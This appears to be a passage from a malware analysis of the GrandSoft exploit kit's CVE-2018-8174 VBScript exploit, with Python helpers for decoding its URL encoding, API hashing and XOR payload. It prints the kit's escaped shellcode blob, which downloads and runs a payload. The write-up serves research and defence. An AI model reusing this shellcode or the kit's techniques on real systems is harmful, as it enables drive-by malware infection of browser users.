G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 
&"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 &"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr )
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141"))
c111111=G00001152223246
End Function
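
The c111111 function above hex-encodes the URL, pads it to a whole number of four-digit groups, and emits %u escapes with the two bytes of each group swapped, so that the UTF-16LE string Unescape() returns holds the plain ASCII URL in memory immediately after the shellcode. The following is an added example (not code from the post or from the exploit kit): a Python mirror of that encoding, the reverse transformation to the bytes the shellcode actually sees, and an analyst helper that pulls the appended URL back out of such a buffer. Function names and the sample hostname are mine.

```python
import re


def vbs_url_escape(url: str) -> str:
    """Mirror c111111's transformation: hex-encode the URL, pad to a whole number
    of 16-bit units, and emit %uXXXX escapes with each pair of bytes swapped.
    (VBScript's Hex() drops the leading zero for bytes below 0x10; %02X is used
    here, which is identical for every printable character a URL contains.)"""
    hexstr = "".join(f"{b:02X}" for b in url.encode("ascii"))
    if len(hexstr) % 4:                 # Round(Len/4) <> Len/4  ->  append "00"
        hexstr += "00"
    units = ["%u" + hexstr[i + 2:i + 4] + hexstr[i:i + 2]
             for i in range(0, len(hexstr), 4)]
    return "".join(units) + "%u0000"    # the script's trailing terminator


def unescape_to_bytes(escaped: str) -> bytes:
    """What Unescape() leaves in memory: each %uXXXX is one UTF-16LE code unit,
    so the swapped hex pairs come back out in the original ASCII byte order."""
    units = re.findall(r"%u([0-9A-Fa-f]{4})", escaped)
    return b"".join(int(u, 16).to_bytes(2, "little") for u in units)


def extract_trailing_url(blob: bytes) -> str:
    """Analyst helper: pull the download URL out of a decoded shellcode buffer.
    The URL sits after the code, NUL-terminated, before the 0x4141 padding."""
    m = re.search(rb"https?://[!-~]+", blob)
    if m is None:
        raise ValueError("no URL found in buffer")
    return m.group(0).decode("ascii")


if __name__ == "__main__":
    # Constructed sample: a reserved hostname stands in for window.location.hostname
    url = "http://example.invalid/7"
    escaped = vbs_url_escape(url)
    print(escaped)
    # a few NOPs, the two NUL units that end the real shellcode, the URL, padding
    blob = unescape_to_bytes("%u9090%u0000%u0000" + escaped + "%u4141" * 8)
    print(blob)
    print(extract_trailing_url(blob))
```

Two details worth noting when reading the original: the padding check in c111111 works because the hex string always has an even length, so Len/4 is either an integer or ends in .5 and Round() never equals it in the latter case; and the byte swap is what makes the shellcode's appended string readable as ASCII without any further decoding.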

Shellcode

The shellcode resolves APIs by hash, but the hash differs from the well-known ones.




The shellcode's hash algorithm is ror14AddHash32. Pseudocode:

acc := 0;
for c in input_string {
    acc := ROR(acc, 14);   // rotate the 32-bit accumulator right by 14 bits
    acc := acc + c;        // add the next character of the export name
}
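Added example (not code from the post): a Python implementation of ror14AddHash32 exactly as the pseudocode defines it (32-bit accumulator, bare export name without a terminator), plus a lookup table builder so that hash constants lifted from the shellcode can be resolved to export names. Function names and the seed export list are mine; the post gives no concrete hash values, so the check below uses a made-up string.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    value &= 0xFFFFFFFF
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror14_add_hash32(name: bytes) -> int:
    """ror14AddHash32 as in the pseudocode: acc = ROR(acc, 14) + c for each byte."""
    acc = 0
    for c in name:
        acc = ror32(acc, 14)
        acc = (acc + c) & 0xFFFFFFFF
    return acc


def build_hash_table(names) -> dict:
    """Map hash -> export name so constants found in the shellcode can be resolved."""
    return {ror14_add_hash32(n.encode("ascii")): n for n in names}


# Constructed seed list of Win32 exports an analyst would start the table with;
# the post does not list which APIs the GrandSoft shellcode resolves.
SEED_EXPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
                "InternetOpenA", "InternetOpenUrlA", "InternetReadFile",
                "CreateFileA", "WriteFile", "WinExec", "GetTickCount"]


def resolve(hash_value: int, table=None) -> str:
    """Look a 32-bit hash up in the table (the seed table by default)."""
    table = table if table is not None else build_hash_table(SEED_EXPORTS)
    return table.get(hash_value & 0xFFFFFFFF, "<unknown>")


if __name__ == "__main__":
    for name in SEED_EXPORTS:
        print(f"{ror14_add_hash32(name.encode()):08x}  {name}")
```

In practice the seed list is the export table of each DLL the shellcode loads (user32 and wininet are pushed as strings in the listing above), hashed with this routine and diffed against the constants in the disassembly; a hash that resolves to nothing is a hint that the routine, or whether the terminator is included, needs re-checking.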


The shellcode uses the GetTickCount function to generate the key.


The decoding algorithm is unchanged from the VBScript version.


Pseudocode:

for ($i = 0; $i < strlen($enc_binary); $i++) {
    $key = ($key + 0xAA) & 0xFF;                  // advance the byte-wide key ($key starts from the numeric value sent in the URL)
    $key = $key ^ 0x48;
    $data[] = chr(ord($enc_binary[$i]) ^ $key);   // XOR one byte of the encrypted payload
}
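Added example (not code from the post): the decoding loop above in Python, with the key taken as the numeric value from the URL. Because the key is masked to a byte on the first step, only its low byte influences the keystream, so when the URL value is missing from a capture all 256 candidates can be tried against the expected MZ header; recover_key does that. Function names and the sample buffer are constructed.

```python
def keystream(key: int, length: int) -> list:
    """Generate `length` key bytes exactly as the decoding loop does:
    key = ((key + 0xAA) & 0xFF) ^ 0x48, carried over between iterations."""
    out = []
    for _ in range(length):
        key = ((key + 0xAA) & 0xFF) ^ 0x48
        out.append(key)
    return out


def decode(enc: bytes, key: int) -> bytes:
    """XOR the encrypted payload with the keystream derived from `key`."""
    return bytes(b ^ k for b, k in zip(enc, keystream(key, len(enc))))


def encode(plain: bytes, key: int) -> bytes:
    """XOR is its own inverse, so producing a test sample uses the same routine."""
    return decode(plain, key)


def recover_key(enc: bytes, magic: bytes = b"MZ") -> list:
    """Try every low byte and return those whose decoding starts with `magic`.
    Only the low byte of the URL value matters, so 256 trials cover all keys."""
    return [k for k in range(256) if decode(enc[:len(magic)], k) == magic]


if __name__ == "__main__":
    # Constructed sample: a fake PE header encrypted with a made-up key
    sample_key = 0x1234
    sample_plain = b"MZ\x90\x00\x03\x00\x00\x00"
    sample_enc = encode(sample_plain, sample_key)
    print("keystream(0, 4):", [hex(k) for k in keystream(0, 4)])
    print("encrypted:", sample_enc.hex())
    print("candidate keys:", recover_key(sample_enc))
    print("decoded:", decode(sample_enc, sample_key))
```

The first keystream byte is a bijection of the low key byte, so matching two bytes of header leaves exactly one candidate; that makes the scheme trivial to undo once the encrypted download has been captured, which is also why the payload should be treated as recoverable from the pcap alone.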

Conclusion

GrandSoft has adopted CVE-2018-8174, which may make it a bit more powerful. The shellcode is somewhat distinctive. Enjoy analyzing the shellcode!